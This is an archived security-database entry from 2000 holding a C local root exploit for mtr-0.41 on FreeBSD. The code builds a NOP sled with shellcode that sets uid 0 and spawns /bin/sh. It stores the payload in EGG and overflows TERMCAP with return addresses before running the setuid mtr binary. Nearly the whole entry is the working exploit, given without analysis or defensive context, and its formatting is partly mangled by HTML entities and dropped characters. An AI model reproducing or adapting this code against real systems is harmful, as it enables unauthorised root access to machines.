mtr-0.41 root exploit

2000-04-24T00:00:00
ID SECURITYVULNS:DOC:116
Type securityvulns
Reporter Securityvulns
Modified 2000-04-24T00:00:00

Description

/ (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) / / freebsd mtr-0.41 local root exploit /

include <stdio.h>

include <sys/param.h>

include <sys/stat.h>

include <string.h>

define NOP 0x90

define BUFSIZE 10000

define ADDRS 1200

long getesp(void) { asm("movl %esp, %eax\n"); }

int main(argc, argv) int argc; char *argv; { char execshell = //seteuid(0); "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80" //setuid(0); "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80" //execl("/bin/sh", "sh", 0); "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    char buf[BUFSIZE+ADDRS+1], *p;
    int noplen, i, ofs;
    long ret, *ap;

    if &#40;argc &lt; 2&#41; { fprintf&#40;stderr, &quot;usage: &#37;s ofs&#92;n&quot;, argv[0]&#41;; exit&#40;0&#41;; }

    ofs = atoi&#40;argv[1]&#41;;

    noplen = BUFSIZE - strlen&#40;execshell&#41;;
    ret = getesp&#40;&#41; + ofs;

    memset&#40;buf, NOP, noplen&#41;;
    buf[noplen+1] = &#39;&#92;0&#39;;
    strcat&#40;buf, execshell&#41;;

    setenv&#40;&quot;EGG&quot;, buf, 1&#41;;

    p = buf;
    ap = &#40;unsigned long *&#41;p;

    for&#40;i = 0; i &lt; ADDRS / 4; i++&#41;
            *ap++ = ret;

    p = &#40;char *&#41;ap;
    *p = &#39;&#92;0&#39;;

    fprintf&#40;stderr, &quot;ret: 0x&#37;x&#92;n&quot;, ret&#41;;

    setenv&#40;&quot;TERMCAP&quot;, buf, 1&#41;;
    execl&#40;&quot;/usr/local/sbin/mtr&quot;, &quot;mtr&quot;, 0&#41;;

    return 0;

}

-- * Fido: 2:480/124 WWW: http://www.freebsd.lublin.pl NIC-HDL: PMF9-RIPE * Inet: venglin@freebsd.lublin.pl * PGP: D48684904685DF43 EA93AFA13BE170BF *